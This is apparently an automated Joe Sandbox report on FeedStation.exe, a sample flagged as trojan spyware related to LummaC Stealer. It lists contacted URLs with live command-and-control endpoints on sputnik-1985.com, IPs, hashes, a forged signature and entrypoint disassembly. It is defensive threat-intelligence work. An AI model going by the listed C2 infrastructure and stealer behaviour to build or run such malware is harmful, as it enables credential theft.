https://sputnik-1985.com/api6C	FeedStation.exe, 00000000.00000003.2412499112.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2400514499.00000000037E2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/subscriber_agreement/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.bradsoft.com/feeddemon/help/3.0/enclosures/	FeedStation.exe	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/.mgmd	FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A	FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.newsgator.com/	FeedStation.exe	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.newsgator.com/U	FeedStation.exe	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/;	FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8	FeedStation.exe, 00000000.00000003.2320868917.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/api#	FeedStation.exe, 00000000.00000003.2400537991.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000002.2417006153.0000000000A96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sputnik-1985.com/api2	FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/stats/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://medal.tv	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/.	FeedStation.exe, 00000000.00000002.2416982397.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2411461978.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/steam_refunds/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	FeedStation.exe, 00000000.00000003.2359347102.0000000003893000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com:443/api	FeedStation.exe, 00000000.00000003.2410786565.0000000000A23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/workshop/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb	FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320868917.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2320951105.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net	FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.112.1	sputnik-1985.com	United States		13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587453
Start date and time:	2025-01-10 11:57:55 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FeedStation.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 8 Number of non-executed functions: 103
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 40.126.32.72, 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:59:12	API Interceptor	11x Sleep call for process: FeedStation.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sputnik-1985.com	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	fghj.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	filename.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	expt64.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	[UPD]Intel_Unit.2.1.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.96.1
steamcommunity.com	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	fghj.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	ModelsPreservation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	filename.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	expt64.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	fghj.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	ModelsPreservation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	filename.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	expt64.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
CLOUDFLARENETUS	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html	Get hash	malicious	HTMLPhisher	Browse	172.67.72.210
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	fghj.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	filename.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	expt64.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.112.1
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.112.1
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 104.21.112.1
	fghj.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.112.1
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.112.1
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 104.21.112.1
	ModelsPreservation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.112.1
	filename.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.112.1
	expt64.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.112.1
	1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.112.1

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.882883769669176
TrID:	Win32 Executable (generic) a (10002005/4) 98.10% Windows ActiveX control (116523/4) 1.14% InstallShield setup (43055/19) 0.42% Win32 Executable Delphi generic (14689/80) 0.14% Windows Screen Saver (13104/52) 0.13%
File name:	FeedStation.exe
File size:	2'000'360 bytes
MD5:	256a1ccec403335433630f6824e081df
SHA1:	88abf0221a21e688971e4f746f802d86a86fe085
SHA256:	f99595da2c8aca38f9749dc0b36d5203e2d51769db297aaa45bcb1eea27cec5d
SHA512:	56bef26930b9c4d7e3e9388fc9abb916f012dc2a643927eb8047527ce337d39e99d76f5613722e4458959fd130d47e954992f3b106c81007d69e8c48203612e0
SSDEEP:	49152:Dp1Apo12fC7jEnsoK/7Co4EQxrwH6FxeUa5zJDs40:DnAu12bnsT/2o4EWrwHYxravDs1
TLSH:	4E958E22F3825877D3631A359C2B52AC55367F245B2864CF7BE43D1C9F396427D2A283
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	870f0e3f7371311f

Static PE Info

General

Entrypoint:	0x64541c
Entrypoint Section:	CODE
Digitally signed:	true
Imagebase:	0x500000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	89219008842d40ae27b868ac6a3a5515

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	22/08/2024 21:26:44 20/08/2025 21:26:44
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	FB871CDFBD500B74EE2AFA5A776E78E2
Thumbprint SHA-1:	04A696B6B949498D3DE9343B11BBFBA471539735
Thumbprint SHA-256:	0F619AD69C4C3DF0CBD718DB3AC011E0A774E8E7FCD3A549DCF735ABE6E6D71B
Serial:	33000003FE6BCEDAD6C80303A30000000003FE

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov ecx, 00000012h
push 00000000h
push 00000000h
dec ecx
jne 00007F67CC83F35Bh
push ecx
mov eax, 00644DDCh
call 00007F67CC701103h
xor eax, eax
push ebp
push 006455ECh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
mov edx, 00645600h
mov eax, 0064561Ch
call 00007F67CC82D6F2h
test al, al
je 00007F67CC83F373h
mov eax, dword ptr [0064A274h]
mov eax, dword ptr [eax]
call 00007F67CC7830FAh
jmp 00007F67CC83F4BAh
lea edx, dword ptr [ebp-20h]
mov eax, 00000001h
call 00007F67CC798E28h
lea eax, dword ptr [ebp-20h]
call 00007F67CC70DFECh
mov edx, dword ptr [00649D74h]
mov byte ptr [edx], al
mov eax, dword ptr [00649D74h]
cmp byte ptr [eax], 00000000h
je 00007F67CC83F42Dh
lea eax, dword ptr [ebp-30h]
xor edx, edx
call 00007F67CC710578h
lea edx, dword ptr [ebp-30h]
mov eax, 00000001h
call 00007F67CC79908Fh
call 00007F67CC799422h
lea edx, dword ptr [ebp-40h]
mov eax, 00000003h
call 00007F67CC798DE1h
lea eax, dword ptr [ebp-40h]
push eax
lea eax, dword ptr [ebp-50h]
mov edx, 00000008h
mov cl, 01h
call 00007F67CC710356h
lea edx, dword ptr [ebp-50h]
pop eax
call 00007F67CC712A19h
jle 00007F67CC83F37Eh
lea eax, dword ptr [ebp-60h]
mov edx, 00000008h
mov cl, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x150000	0x2fa4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16b000	0x99200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1e5600	0x2fe8	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x154000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
